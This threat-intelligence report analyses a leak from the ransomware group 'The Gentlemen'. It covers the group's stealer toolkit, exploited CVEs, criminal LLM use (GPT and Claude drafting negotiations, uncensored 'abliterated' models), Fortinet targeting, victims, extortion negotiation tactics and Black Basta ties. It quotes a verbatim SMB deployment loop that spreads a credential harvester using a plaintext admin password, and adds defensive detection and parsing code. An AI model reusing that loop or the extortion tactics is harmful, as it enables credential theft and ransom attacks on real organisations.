However, payments by zeta88 reveal several patterns most likely associated with “freelance” threat actors and infrastructure paid for via Telegram-based payment processors. There is also some exposure to Russia-based services and services catering to Russian speakers, such as Grinex.
Freelance threat actors are paid around 1000 USD for unspecified services on an ad-hoc basis. There are four such payments, though only one has an identified counterparty, Kunder.
Kunder deposited funds directly to an unlicensed exchange known to have a low KYC threshold; the account on the platform had a lifetime receipt of 2.5 BTC between Sep 2025 and May 2026, totalling around 229,000 USD and indicating a lucrative career with “The Gentlemen”. Backtracing funds from the deposit address showed relationships with high-risk and illicit services that are Russia-based and serve Russian users, such as Rapira, suggesting the user of this wallet is likely Russian or a Russian speaker.

Crystal Intelligence: zeta88 wallet analysis
Other payments from the address also showed on-chain relationships with crypto-draining malware affecting Asian-based victims; these addresses similarly showed exposure to services catering to individuals likely based in these jurisdictions.
Some funds appeared to be consistent with payment for infrastructure: low-value transactions to payment processors. Notably, payments were made to Cryptomus, a service that has often been associated with Russian cybercrime-related activity.

Crystal Intelligence: On-chain analysis of zeta88 infrastructure
3.8 Stealer Toolkit — Key Findings (TOOLS/FOBOS)
Confirmed tooling present in operator kit (from screenshots):
| Tool | Notes |
|---|---|
| Phemedrone Stealer v2.3.2 | Credential and wallet theft capabilities (browser creds, crypto wallets, VPN creds). Dated Oct 2024 in toolkit. |
| FOBOSLOADER | Custom loader/dropper. Dated Aug 2024 in toolkit. |
| XENO | RAT. Dated Jul 2024 in toolkit. |
| XenAllPasswordPro | Mass credential harvesting via SMB; deployment scripting captured verbatim in the leak. |
| waterhydra (CVE-2024-21412) | URL-in-ZIP initial-access exploitation workflow referenced in toolkit foldering. |
| BobTheSmuggler | HTML smuggling tooling. |
| pdfdropper | PDF-based dropper tooling. |
| HTMLSMUG | HTML smuggling variant. |
| G-BOT | Custom C2 with Linux/Windows beacons, SOCKS5 support, and a captured builder UI. |
Firefox/Browser credential extraction DLL set (observed in multiple screenshots): freebl3.dll, mozglue.dll, nss3.dll, softokn3.dll, nspr4.dll, plc4.dll, plds4.dll, msvcp140.dll, vcruntime140.dll
These are Mozilla NSS libraries commonly used for offline decryption of Firefox/Thunderbird stored credentials. Operator notes indicate their method broke for newer Firefox versions and they were awaiting updated DLLs.
AV-evasion DLL naming observed (masquerading as game anti-cheat / security tooling): EAAntiCheat1.exe.dll, Valorant.exe.dll, Sophos.exe.dll, Avast.exe.dll
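An added detection example for the two artefacts above (not from the report, the leak, or the toolkit it describes): a Python rule over image-load records, in a Sysmon Event ID 7 style, that flags a non-Mozilla process loading the NSS DLL set and any loaded module named like `Something.exe.dll`. The record format, the Mozilla install paths, the minimum-DLL threshold and the sample events are assumptions.

```python
# Added example, not from the report or its authors: a rule over image-load records
# (constructed here as (process_image, loaded_module) pairs, as Sysmon Event ID 7 would
# supply) that raises two findings tied to the toolkit above:
#   1. a process outside the Mozilla install directories loading the NSS DLL set used
#      for offline Firefox/Thunderbird credential decryption;
#   2. a loaded module named '<something>.exe.dll', the masquerade naming observed.
import ntpath

# NSS/NSPR libraries from the DLL set listed above. msvcp140/vcruntime140 are generic
# MSVC runtimes loaded by many programs, so they are deliberately excluded here.
NSS_DLLS = {"freebl3.dll", "mozglue.dll", "nss3.dll", "softokn3.dll",
            "nspr4.dll", "plc4.dll", "plds4.dll"}
# Assumed legitimate locations; extend for portable or non-default installs.
MOZILLA_DIRS = ("c:\\program files\\mozilla firefox\\",
                "c:\\program files\\mozilla thunderbird\\",
                "c:\\program files (x86)\\mozilla firefox\\")
NSS_MIN_COUNT = 3  # assumed: distinct NSS modules one process must load before we flag


def is_mozilla_process(image):
    return image.lower().startswith(MOZILLA_DIRS)


def is_exe_dll_masquerade(module):
    """True for names like 'Sophos.exe.dll' or 'Valorant.exe.dll'."""
    return ntpath.basename(module).lower().endswith(".exe.dll")


def analyse_image_loads(records):
    """records: iterable of (process_image, loaded_module) pairs.
    Returns a list of (finding_type, process_image, detail) tuples."""
    nss_by_process = {}
    findings = []
    for image, module in records:
        name = ntpath.basename(module).lower()
        if is_exe_dll_masquerade(module):
            findings.append(("exe_dll_masquerade", image, module))
        if name in NSS_DLLS and not is_mozilla_process(image):
            nss_by_process.setdefault(image, set()).add(name)
    for image, loaded in nss_by_process.items():
        if len(loaded) >= NSS_MIN_COUNT:
            findings.append(("nss_outside_mozilla", image, sorted(loaded)))
    return findings


def sample_records():
    """Constructed image-load events: Firefox itself (benign), a harvester staged in
    the temp path seen in the deployment script, and a masqueraded module."""
    firefox = "C:\\Program Files\\Mozilla Firefox\\firefox.exe"
    harvester = "C:\\Windows\\Temp\\BdDfelT\\XenAllPasswordPro.exe"
    service = "C:\\Users\\Public\\svc.exe"
    nss_set = ("nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll")
    recs = [(firefox, f"C:\\Program Files\\Mozilla Firefox\\{d}") for d in nss_set]
    recs += [(harvester, f"C:\\Windows\\Temp\\BdDfelT\\{d}")
             for d in nss_set + ("vcruntime140.dll",)]
    recs.append((service, "C:\\Users\\Public\\Sophos.exe.dll"))
    return recs


if __name__ == "__main__":
    for kind, image, detail in analyse_image_loads(sample_records()):
        print(f"[{kind}] {image}: {detail}")
```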
CVEs referenced as exploited or operationally discussed:
- CVE-2024-55591 (FortiOS auth bypass — primary initial access)
- CVE-2024-21412 (WaterHydra / URL-in-ZIP)
- CVE-2025-32433 (Erlang/OTP SSH RCE — exploit sharing context; “Avoid” referenced)
- CVE-2025-33073 (discussed by qbit)
Stealer toolkit — verbatim quotes (selected)
XenAllPasswordPro deployment script (verbatim excerpt):
2026-01-09 17:12:14 — zeta88:
```bash
for ip in $(cat ips.txt); do
    url="http://10.10.16.249:8887/"
    temp="BdDfelT"
    user="itadmin"
    pass="zhhyx3#4$"
    nxc smb $ip -u $user -p $pass -X '@("XenAllPasswordPro.exe","freebl3.dll","mozglue.dll","nss3.dll","softokn3.dll","vcruntime140.dll"...)'
    nxc smb $ip -u $user -p $pass -x "C:\\Windows\\Temp\\${temp}\\XenAllPasswordPro.exe -a -r ...${ip}.html"
done
```
Firefox NSS “External DLL” awareness (OCR excerpt):
“External file is needed for mozilla based apps like firefox, thunderbird, postbird etc. Important Update: Few days ago, our Dev team found that Firefox has made changes to its NSS library (in External folder DLLs) affecting mostly Firefox v140+ or higher. Our team will be rolling out new releases soon after further verification. If you want, we can send you a private copy of the new External DLL folder.”
Exploit chaining / coercion awareness (verbatim):
zeta88: “Находит WebDAV WebClient, CVE-2025-33073 (NTLM reflection), NTLMv1 + всякие PrinterBug, PetitPotam и т.п.”
Translation: “Finds WebDAV WebClient, CVE-2025-33073 (NTLM reflection), NTLMv1 + various PrinterBug, PetitPotam etc.”
Note: Enumerates coercion/relay attack surface; demonstrates awareness of multiple NTLM abuse vectors.
CVE-2024-55591 exploitation confirmed (verbatim):
zeta88: “[] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation”
CVE references — additional verbatim quotes:
Kunder: “CVEs: [CVE-2024-55591]”
qbit (citing forum handle Avoid): “Используйте мой чекер CISCO. А затем свежайший сплоит CVE-2025-32433 и доступы в кармане.”
Translation: “Use my Cisco checker. Then the freshest exploit CVE-2025-32433 and access is in your pocket.”
Note: Third-party exploit advertisement shared in-channel; indicates active CVE monitoring and tool sourcing.
4. AI-Assisted Operations — LLMs, Uncensored Models & GPU Compute
The leak contains direct evidence of operators integrating AI tools into multiple stages of the ransomware lifecycle: negotiation language generation, uncensored model sharing, and proposed GPU-accelerated triage of stolen data. While AI adoption by cybercriminals has been widely theorised, this corpus provides some of the first verbatim-supported evidence of how a mid-tier RaaS operation practically adopts these capabilities — including where they fail.
4.1 Observed AI Integration Points
Negotiation drafting and language generation. zeta88 explicitly references GPT and Claude as standard operational tools for producing negotiation text:
zeta88:
“Гпт . клауде - мы играем в переговорщика. он тебе строчит )”
Translation: “GPT, Claude — we're playing negotiator. It'll write for you.”
Note: Direct evidence of commercial LLM use for negotiation language generation. The casual tone suggests established practice, not experimentation.
The operational implication is immediate: AI-generated text allows Russian-speaking operators to conduct fluent English-language victim negotiations without native speakers — directly reducing the group's dependency on the caller recruitment pipeline documented in Section 3.7.10.
Uncensored model sharing and local deployment. qbit shared a link to an “abliterated” Qwen model on Hugging Face, marketed as uncensored — indicating active experimentation with locally deployable LLMs that bypass the safety guardrails of commercial APIs. “Abliterated” models have had alignment/safety training deliberately removed, enabling unconstrained output including social engineering scripts and data analysis without content filtering.
The shift toward local models is operationally significant: it eliminates the audit trail created by commercial API usage (OpenAI, Anthropic), removes the risk of account termination for terms-of-service violations, and mirrors legitimate enterprise concerns about data sovereignty — applied to criminal infrastructure.
GPU rental for AI-assisted data triage. Protagor proposed renting GPU compute on vast.ai to run uncensored models against stolen victim data:
Protagor:
“отдать ии на просмотр важных данных... на vast.ai взять ГПУ там ИИ без цензуры можно попробовать”
Translation: “Give AI to review important data... rent GPU on vast.ai, can try uncensored AI there.”
Note: Proposes rented GPU compute for uncensored AI-assisted triage of stolen data — a potential force multiplier for identifying high-value extortion material.
This represents a qualitative shift in post-compromise operations. Currently, ransomware groups manually review stolen data to identify leverage material (financial records, personal data, regulatory documents). AI-assisted triage could dramatically accelerate this process, enabling operators to process terabytes of exfiltrated data in hours rather than days — directly increasing the speed and precision of double-extortion campaigns.
Operator scepticism and uneven adoption. Not all operators find AI tools useful:
Wick:
“не, нихуя не получается. иишка хуйню советует мне какую то”
Translation: “Nothing works, the AI is giving me bullshit advice.”
Note: Uneven adoption — at least one affiliate finds LLMs unhelpful for technical troubleshooting, suggesting AI integration is still operator-dependent rather than systematised.
4.2 Translation Tooling — Reverso as Operational Bridge
Beyond LLMs, the group relies on Reverso.net for English translation, visible in operator browser tabs during negotiation workflows. This positions AI language tools as one layer in a broader translation stack — LLMs for drafting fluent negotiation prose, Reverso for quick word/phrase lookups — that collectively reduces the language barrier for non-English-speaking operators engaging with English-speaking victims.

4.3 Analytical Assessment — Implications for the RaaS Ecosystem
The AI integration observed in this corpus is early-stage but directionally significant. Three implications warrant attention from defenders:
1. Faster victim processing at scale. AI-assisted data triage — if operationalised beyond the proposal stage — would allow groups to process exfiltrated data faster, identify leverage material more precisely, and move to negotiation sooner. For defenders, this compresses the window between breach detection and extortion contact.
2. Reduced language barriers. LLM-generated negotiation text enables Russian-speaking operators to conduct credible English-language negotiations without native speakers. This lowers the barrier to entry for non-English-speaking RaaS operations targeting Western victims and reduces recruitment dependencies (compare the SIP trunk procurement and caller recruitment pipeline in Section 3.7.10).
3. Shift to local/uncensored models. The progression from commercial APIs (GPT/Claude) toward self-hosted uncensored models (abliterated Qwen, rented GPU on vast.ai) mirrors a broader trend: operators want the capability without the audit trail. Commercial API monitoring and takedowns become less effective as groups shift to local inference on rented or owned hardware.
What this is not: There is no evidence in the corpus of AI-generated malware, automated vulnerability exploitation, or AI-driven lateral movement. The observed use cases are exclusively operational enablement — language, data review, and negotiation support. The group's technical tradecraft (FortiGate exploitation, nxc enumeration, credential dumping) remains human-driven. The threat is not AI replacing operators but AI making existing operators faster, more fluent, and better informed.
4.4 Branding
The official logo used by the group was generated with ChatGPT (GPT-4o, OpenAI API):

The Gentlemen's logo
The following metadata can be extracted from this logo; the claim generator name field reads ChatGPT:

Logo metadata — EXIF claim generator field showing “ChatGPT” as the creation tool
5. Fortinet Target Pipeline
The corpus contains 98 deduplicated Fortinet device entries with IP addresses, models, firmware versions, hostnames, and country information. These represent the group's active targeting pipeline.

Fortinet target pipeline — geographic distribution (pie chart)
The full target list with IPs, models, and firmware versions is available in the accompanying Fortinet_targets.csv data file.

FortiGate interfaces page for a victim network

Structured Fortinet target spreadsheet

Fortinet scan logs from leaked operator data
6. Victim Dossier
We parsed the 22 Rocket.Chat CSV exports into a queryable database, ran automated IOC extraction across all message bodies, and identified victims through a tiered confidence model — requiring direct evidence of internal access (DA confirmation, locker commands, credential usage, ransom notes) for the highest tier, down to FortiGate hostname identification for lower tiers. After deduplicating cross-tier overlaps, we arrived at 66 unique victim organisations. This count was independently validated by the Ransom-ISAC collaborative analysis using a separate methodology.
The following entities have documented internal access in the corpus, ordered by volume of evidence.

Victim Geographic Distribution — 66 confirmed victims across 4 regions

Victim Sector Breakdown — 66 confirmed victims across 13 sectors
RansomLook DLS Public-Claim Overlap (8 of 66 — 12.1%)
Victim domains extracted from the leaked corpus were cross-referenced against the RansomLook public API (/api/victims) to identify which chat-identified victims had also been publicly claimed on a ransomware leak site. Of the 66 confirmed victims, 8 matched RansomLook records attributed to The Gentlemen.
| Victim (anonymised) | Country | Sector | RansomLook Claim Date | Cross-Claim |
|---|---|---|---|---|
| Consumer electronics manufacturer | Turkey (global) | Consumer electronics | 2026 | — |
| Software / Atlassian partner | UK | Software/Atlassian | 2026 | — |
| Local municipality | South Africa | Government | 2026 | LockBit5 (7 Dec 2025) |
| Mining company | Ghana | Mining | 2026 | — |
| Educational institution | Poland | Education | 2026 | — |
| Aviation / transport company | Taiwan | Aviation | 2026 | — |
| Healthcare / pain management | USA | Healthcare | 2026 | — |
| Shipping / logistics firm | Madagascar | Unknown | 2026 | — |
Note: 1 of the 8 overlapping victims (South African local municipality) was also previously claimed by LockBit5, representing a confirmed case of re-victimisation across groups.
The leak corpus documents 66 confirmed victims across multiple evidence tiers, spanning 30+ countries and diverse sectors.
Cross-referencing the 66 chat-identified victims against the RansomLook dataset revealed one instance of re-victimisation: a South African local municipality in the government sector was first claimed by LockBit5 on 7 December 2025, approximately three months before The Gentlemen fully encrypted the same organisation on 21 March 2026.
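The parsing, IOC extraction, tiered-confidence scoring and RansomLook cross-referencing steps described at the start of this section and in the DLS overlap paragraph above, as an added example that is not Ransom-ISAC's or RansomLook's own tooling. The export column names, the tier keywords, the sample rows and the shape of the /api/victims records are all constructed assumptions for illustration.

```python
import csv
import io
import re

# Constructed rows in the shape of a Rocket.Chat room export; column names are assumed.
SAMPLE_EXPORT = """room,ts,username,msg
724140,2026-03-20T10:01:00Z,zeta88,"got DA on corp-a.example, dumping creds from dc01.corp-a.example"
724140,2026-03-21T08:15:00Z,zeta88,locker started on corp-a.example README-GENTLEMEN dropped
302930,2026-02-02T12:00:00Z,qbit,fortigate fw.corp-b.example 203.0.113.10 FortiOS 7.0.12
302930,2026-02-03T09:30:00Z,qbit,vpn creds valid for corp-b.example
133148,2026-01-11T14:20:00Z,protagor,target intake corp-c.example https://www.zoominfo.com/c/corp-c
893402,2026-04-02T16:45:00Z,kunder,fortigate vpn.corp-d.example 198.51.100.7 7.2.5
"""

# Constructed leak-site records; the real /api/victims response shape is assumed.
RANSOMLOOK_RECORDS = [
    {"group": "thegentlemen", "domain": "corp-a.example", "discovered": "2026-03-25"},
    {"group": "lockbit5", "domain": "corp-b.example", "discovered": "2025-12-07"},
    {"group": "thegentlemen", "domain": "corp-b.example", "discovered": "2026-02-10"},
    {"group": "qilin", "domain": "unrelated.example", "discovered": "2026-01-01"},
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
# OSINT and tooling domains that are never victims (constructed allowlist).
NON_VICTIM_DOMAINS = {"zoominfo.com", "rocket.chat", "vast.ai"}

# Evidence tiers approximating the report's confidence model (keywords constructed):
# 1 = direct internal access, 2 = target intake / OSINT, 3 = FortiGate hostname only.
TIER_RULES = [
    (1, re.compile(r"\b(got da|locker|readme-gentlemen|creds valid|ransom note)\b", re.I)),
    (2, re.compile(r"zoominfo\.com|target intake", re.I)),
    (3, re.compile(r"\bforti(gate|os)?\b", re.I)),
]

def registrable(host: str) -> str:
    """Collapse a host to its organisation domain (assumes no multi-part TLDs)."""
    return ".".join(host.lower().split(".")[-2:])

def parse_export(text: str) -> list:
    """Parse one room export into row dicts keyed by the header line."""
    return list(csv.DictReader(io.StringIO(text)))

def extract_iocs(msg: str) -> tuple:
    """Return (IPv4 addresses, candidate victim organisation domains) found in msg."""
    ips = set(IPV4_RE.findall(msg))
    orgs = {registrable(d) for d in DOMAIN_RE.findall(msg)} - NON_VICTIM_DOMAINS
    return ips, orgs

def score_tier(msg: str):
    """Best (lowest-numbered) tier whose evidence keywords appear in msg, else None."""
    for tier, rule in TIER_RULES:
        if rule.search(msg):
            return tier
    return None

def build_dossier(rows: list) -> dict:
    """Aggregate evidence per organisation; the strongest tier wins across rooms."""
    dossier: dict = {}
    for row in rows:
        tier = score_tier(row["msg"])
        if tier is None:
            continue
        ips, orgs = extract_iocs(row["msg"])
        for org in orgs:
            entry = dossier.setdefault(org, {"tier": tier, "rooms": set(), "ips": set()})
            entry["tier"] = min(entry["tier"], tier)  # dedupe cross-tier overlap
            entry["rooms"].add(row["room"])
            entry["ips"] |= ips
    return dossier

def cross_reference(dossier: dict, records: list, group: str = "thegentlemen") -> dict:
    """Match dossier orgs to public DLS claims; list earlier claims by other groups."""
    matches: dict = {}
    for org, entry in dossier.items():
        own = [r for r in records if r["domain"] == org and r["group"] == group]
        if not own:
            continue  # chat-identified but never posted to the group's leak site
        claimed = min(r["discovered"] for r in own)  # ISO dates sort lexically
        matches[org] = {
            "tier": entry["tier"],
            "claimed": claimed,
            "revictimised_from": sorted(
                f'{r["group"]} ({r["discovered"]})'
                for r in records
                if r["domain"] == org and r["group"] != group and r["discovered"] < claimed
            ),
        }
    return matches

if __name__ == "__main__":
    dossier = build_dossier(parse_export(SAMPLE_EXPORT))
    overlap = cross_reference(dossier, RANSOMLOOK_RECORDS)
    for org, entry in sorted(dossier.items()):
        print(f"T{entry['tier']} {org:16} rooms={sorted(entry['rooms'])} ips={sorted(entry['ips'])}")
    print(f"DLS overlap: {len(overlap)} of {len(dossier)}; re-victimised: "
          f"{[o for o, h in overlap.items() if h['revictimised_from']]}")
```

On the constructed rows the corp-b entry is first seen only as a FortiGate hostname (tier 3) and is promoted to tier 1 when valid credentials appear in the same room, and the cross-reference flags its earlier LockBit5 claim as a re-victimisation.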
Additional analyst observations (from collaboration notes)
- 4vps.su references: collaborators noted repeated mentions of https://4vps.su/, aligning with The Gentlemen's public claim that their Rocket.Chat exposure was linked to a hosting-provider compromise. Notably, 4VPS.SU has prior associations with threat actor infrastructure — the Emotet botnet is known to have used this hosting provider, establishing a pattern of the service being leveraged by cybercriminal operations.
- China / South Korea target chatter: a collaboration note (screenshot) suggests discussion of a Chinese target and mentions a marketing agency without an associated IP or ZoomInfo reference. Two Chinese IP addresses were observed in the corpus: one could not be attributed to a known entity; the other resolves to a Chinese hospital entity, suggesting either a compromised host or operator infrastructure co-located at that provider. Separately, the leak includes target-intake style commentary for a South Korea–linked target (https://www.zoominfo.com/c/[REDACTED]), including an explicit strategy note (“Koreans care about their reputation a lot”) and intent to leverage a client database.

China-linked infrastructure reference — IP attribution including Chinese hospital entity.
- Partial view of the operation: collaborators assessed the exported rooms appear to reflect primarily operator/affiliate chat, with other functional areas (phishing, brute-force, infrastructure) either missing from the leak or potentially externalized via an IAB/RaaS model.
[REDACTED] file listing — README-GENTLEMEN ransom note and .i8p14s encrypted files visible in directory, confirming successful ransomware execution
SMB authentication against a victim's domain controller

Intrusion — Kali terminal with SMB enumeration against a victim, iRMC S6 admin panel visible

Note: Detailed per-victim case studies have been excluded from this report to protect ongoing investigations and reduce report length. All victim-specific evidence, tiered attribution, and per-case write-ups are maintained internally.
6.1 Pre-Existing Ransom Notes from Other Groups
DeadBolt:

DeadBolt Team ransom note on a browsed NAS — prior compromise by another group on infrastructure later accessed by The Gentlemen.
The BTC address bc1q3adze9h3u5e8kx9zwj5tuw0dn0pq28f26xgpvq shown here is a dead wallet address:

DiskStation Security:
This is a separate, much smaller operation from the main Gentlemen corporate ransomware — opportunistic NAS extortion, not the $200k corporate negotiations seen in the other screenshots. It's consistent with the T2-NAS tier activity in the chat leaks where actors were mass-hitting exposed Synology devices. The ransom note displays a contact email of [email protected], a payment deadline of February 19, 2025, and a demand of 0.052 BTC (~$5,000 at the time) to wallet address bc1qgl29fwvpaky7vr94qwufeq56d00l5h60fe7utx.

DiskStation Security Ransom Note
As with DeadBolt, the address is not active:

Possible other ransomware variant:
An unknown malware variant was also reported in an April 2026 operation led by the affiliate Kunder (a new operator not previously seen in the dataset). After Kunder gained initial access and shared credentials with zeta88, zeta88 responded by providing the credential dumpers XenArmor and kSlkatz. Despite active, GPO-managed Defender policies and blocked RDP to the domain controller, Kunder successfully accessed the file share server containing financial documents, planned exfiltration via rclone to MEGA, and deployed ransomware (indicated by a DATALOSS_WARNING_README ransom note). By April 23, Kunder's compromised account had been demoted, degrading access. The operation culminated on April 30 — the very last message captured in the dataset — with zeta88 instructing: “save everything important — I'm deleting Rocket.”

7. Negotiation Tactics
Cross-reference: The negotiation below corresponds to one of the 66 confirmed victims documented in Section 6. The operator references the victim's “$163 million revenue” and knowledge of a “branch in Thailand,” indicating pre-negotiation OSINT on the target's corporate structure (consistent with the ZoomInfo reconnaissance pipeline in Section 3.1). The pricing progression here ($225K → $185K → $100K floor → final $190K demand) illustrates how the formulaic pricing tiers summarised in Section 3.1 evolve during actual negotiations.
A complete victim-side negotiation transcript is captured in screenshots from room 133148. The negotiation platform is qTox (UI title q7sx), with the victim using handles MrM1989 / MrM19892 and the operator identified as “The Gentlemen.”
Pricing evolution observed:
- Opening: $225K total ($80K decrypt + $120K data removal + $25K report)
- Reduced: $185K ($65K decrypt + $95K data + $25K report)
- Floor: $100K “all options”
- Victim counter: $15K (for data deletion only)
Key operator statements:
- References victim's “$163 million revenue” and suggests paying through their “branch in Thailand” where “they will easy buy a bitcoins”
- States: “We will never confirm that we was attack you. This is our business, if we will not keep our words, no one will pay.”
- Offers “universal decryptors for each OS”
- Threatens: “Deadline still 29 nov. Then we will delete decryptor and start publish all data.”

Victim negotiation via qTox — pricing breakdown from $225K to $100K floor
The Gentlemen employed several deliberate tactics throughout the negotiation. They opened by framing payment as a business transaction rather than extortion, stating “this is our business, if we will not keep our words, no one will pay,” positioning themselves as reliable operators to reduce the victim's hesitation. They imposed a hard deadline of 29 November for data publication to create urgency, then offered decryptor testing on two files to build trust in their ability to deliver. When the victim pushed back on proof of exfiltration, they accommodated within a timeframe rather than dismissing the concern, maintaining rapport while keeping control of the timeline. Their pricing model appeared formulaic — 80/100/20 scoring encryption, data, and reports — suggesting a standardised valuation rather than an arbitrary demand, which lends perceived legitimacy to the asking price.

The victim representative used equally structured counter-tactics. They consistently framed themselves as a middleman acting on behalf of management rather than a decision-maker, creating negotiating distance and lowering the perceived authority at the table. They separated decryption value from data deletion value, conceding the encryption impact while demanding proof of exfiltration before agreeing to pay for deletion — effectively halving the leverage. Their final offer of 15A USD against a 200k demand was a deliberate low anchor, inviting a counter rather than closing.
The negotiation reaches its endgame here. The victim offers 15A USD ($15,000), the Gentlemen reject it and counter with their 200k valuation, then drop to 195k “for all options.” The victim comes back saying management approved a figure but notes that “ransom payments are prohibited in our country” and anything higher would require government permission they'd never get. The Gentlemen dismiss this, stating they already sent BTC instructions, that the victim should not pay as “ransom” officially, and that their organisation “already pay 100k for some group” previously — revealing they have intelligence on the victim's prior ransomware payment history, likely sourced from leaked negotiation data or dark web forums.

The closing is pure pressure. The Gentlemen claim this is their “lowest price” at 190k “all options,” warn there will be “no other options — pay, or everything was told before,” then pivot to making payment logistics sound trivial — “send amounts by chunks 30/50/50 from different wallets” and even suggest the victim can “send money to your branch to Thailand officially and they will easy buy a bitcoins” through a money remittance company. This is notable because it suggests the group has specific knowledge of the victim's geographic footprint (Thai operations) and local crypto purchasing options, indicating pre-negotiation OSINT on the victim's corporate structure.
8. External Actor Connections
8.1 Matrix Log Evidence (Pre-Rocket.Chat Operations)
Screenshots in the corpus reproduce Matrix chat logs from homeserver bestflowers247.online with handles @usernamegg, @lapa, and Tinker. These logs date from September–November 2023 and show phishing template drafting, OWA credential sharing, and Censys/Fortinet reconnaissance — operationally identical patterns to the current Rocket.Chat operations. This is not incidental overlap: the same reconnaissance methodology (Censys → Fortinet → credential harvest → OWA phishing) runs as a continuous thread from the 2023 Matrix logs through to the 2025–2026 Rocket.Chat corpus, indicating procedural continuity across platforms.

Cross-leak nickname overlap — Tinker: The handle “Tinker” appears across three separate ransomware leak corpora: Conti, Black Basta, and now The Gentlemen. In the Black Basta leaks, Tinker was associated with analyzing stolen data and conducting negotiations — precisely the functions visible in The Gentlemen's Matrix logs, where Tinker participates in phishing template drafting and credential operations. Analyst1's Anastasia Sentsova documented Tinker's role within the Black Basta ecosystem in their report Inside BlackBasta. The significance here is not just the name reuse — it is the functional continuity: Tinker performs the same category of work (data analysis, victim engagement, credential operations) across all three corpora. Handle reuse alone is weak evidence; handle reuse combined with identical operational function across three related RaaS ecosystems, on infrastructure publicly attributed to one of those ecosystems, is a substantially stronger signal.

Phishing template scripts for users
Infrastructure attribution: The Matrix homeserver bestflowers247.online is publicly attributed to the Black Basta leaked Matrix chat server (e.g., Cloudflare Cloudforce One reporting). The Gentlemen's operators possessed and shared screenshots from this homeserver — meaning they either (a) had direct access to Black Basta's internal communications platform, or (b) received these logs from someone who did. Neither scenario is consistent with the groups being unrelated. At minimum, this establishes a personnel or operational bridge between Black Basta and The Gentlemen's predecessor operations.
8.2 Devman / Black Basta Connection
The corpus contains screenshots and internal discussion directly linking The Gentlemen's operators to awareness of the Black Basta leadership and the Oleg Nefedov arrest:
Establishing Devman's identity (January 2026):
Weeks before the arrest news, quant and zeta88 were already discussing Devman's role:
2026-01-15 — quant [translated from Russian]:
“Is Black Basta Devman or what?”
Note: Suggests quant was not fully briefed on Black Basta's leadership structure — information asymmetry within the group.
2026-01-12 21:38:30 — zeta88:
“блять вот нахуй а ... это же пздц сразу человек всеми своими действиями показывал что нахуй такое не надо. с локов уходил психовал, стучал, туда сюда девману и обратно.”
Translation: “Fucking hell... that's insane, right away the person showed with all their actions that this isn't needed. Was leaving ransomware ops, was panicking, snitching, back and forth with Devman.”
Note: zeta88 references a volatile individual shuttling between groups and informing — implies awareness of informant activity within the broader RaaS ecosystem.
Reaction to the Nefedov arrest (February 2026):
On February 28, zeta88 posted two images in quick succession (05:20:06 and 05:20:31 UTC) with no accompanying text — a tweet about the de-anonymization of “Devman (aka Oleg Nefedov, Tramp, Sozdatel)” and a tweet about BKA/Europol/Interpol issuing an international arrest warrant for Nefedov as “leader of the Black Basta ransomware group.” The images were shared without comment in the CSV (8990/724140/27fef893b9320ac438dd7d837bda2208.csv); the context comes from the messages that immediately followed:
2026-02-28 — zeta88 [translated from Russian]:
“Payments were still happening etc etc. And there was an attack on us, and the attacker was attacked [blackmailed], and the researcher article was deleted.”
Note: Links the earlier insider/blackmail incident to the broader sequence of events around Devman's disappearance.
2026-02-28 — zeta88 [translated from Russian]:
“Short version: Devman either got arrested, health issues, or rebranded — completely gone.”
Note: Treats Devman's exit as a matter-of-fact competitive update, not a personal concern.
The group treats the Black Basta arrest as relevant background to their own competitive landscape — no explicit reaction to the tweet, just noting Devman's disappearance as a fact and moving on.

Oleg Nefedov identification — operator screenshot showing the Nefedov/Black Basta arrest tweets shared by zeta88
Additionally, a third-party messenger screenshot shows tank telling hastalamuerte: “I'm working on Devman's targets. Better chance of not starving” — suggesting direct operational overlap with former Black Basta infrastructure.

These connections are documented but not independently verified by the corpus.
8.3 Analytical Assessment — Black Basta Successor Faction (Moderate-High Confidence)
Assessment: The Gentlemen are assessed with moderate-high confidence to be a Black Basta successor faction — a splinter group formed by experienced Black Basta affiliates and operators who carried forward playbooks, infrastructure access, and operational methodology when Black Basta collapsed in early-to-mid 2025. This is not a rebrand (different leadership structure, different brand identity, different locker), but an organisational descendant with direct personnel continuity from the Conti → Black Basta lineage.
Confidence basis — five converging evidence threads:
| # | Evidence | Significance | Weight |
|---|---|---|---|
| 1 | bestflowers247.online Matrix logs in operator possession (Section 8.1) | This is Black Basta's own Matrix homeserver (Cloudflare Cloudforce One attribution). The Gentlemen's operators possessed and shared screenshots from it — meaning they had direct access to BB's internal comms or received logs from someone who did. Neither scenario is consistent with the groups being unrelated. | High |
| 2 | Tinker handle across Conti → Black Basta → The Gentlemen (Section 8.1) | Not just name reuse — functional continuity. Tinker performs the same category of work (data analysis, victim engagement, credential operations) across all three corpora, on infrastructure attributed to Black Basta. Handle reuse + identical operational function + attributed infrastructure = strong personnel overlap signal. | High |
| 3 | tank/hastalamuerte screenshot — working “Devman's targets” (Section 8.2) | This is the strongest single piece of evidence for operational continuity. A Gentlemen operator's screenshot shows active work on targets explicitly attributed to Devman (Oleg Nefedov, Black Basta's leader). This is not awareness of BB — it is direct operational inheritance: a Gentlemen affiliate working victim targets that originated from BB's pipeline. This demonstrates that victim target lists, and potentially access, flowed from Black Basta into The Gentlemen's operation. | Very high |
| 4 | zeta88's insider knowledge of BB internal dynamics (Section 8.2) | zeta88 discusses Devman with the familiarity of a former colleague, not an outside observer. References to a volatile individual “back and forth with Devman,” insider knowledge of informant activity, and matter-of-fact treatment of Nefedov's arrest as a competitive update rather than external news — all indicate prior direct working relationships within the BB ecosystem. | High |
| 5 | Procedural and timeline continuity | The identical attack methodology (Censys → Fortinet → credential harvest → OWA phishing) runs as an unbroken thread from the 2023 Matrix logs (on BB's server) to the 2025–2026 Rocket.Chat corpus. Black Basta's operational collapse occurred in early-to-mid 2025; The Gentlemen emerged in July/August 2025. The timing is consistent with operators regrouping under a new brand after their previous operation became untenable. | Moderate |
What prevents high confidence: No confirmed real-world identity overlap between BB and Gentlemen personnel beyond the Tinker handle. The Russian-speaking RaaS ecosystem is small and incestuous — infrastructure sharing, personnel migration, and cross-pollination between groups are common and do not always indicate direct organisational succession. The Gentlemen may include former BB personnel without being a coherent successor entity. Further corroboration — shared Tox IDs across corpora, blockchain flow analysis linking BB and Gentlemen wallets, or confirmed identity overlap via OSINT — would be needed to elevate to high confidence.
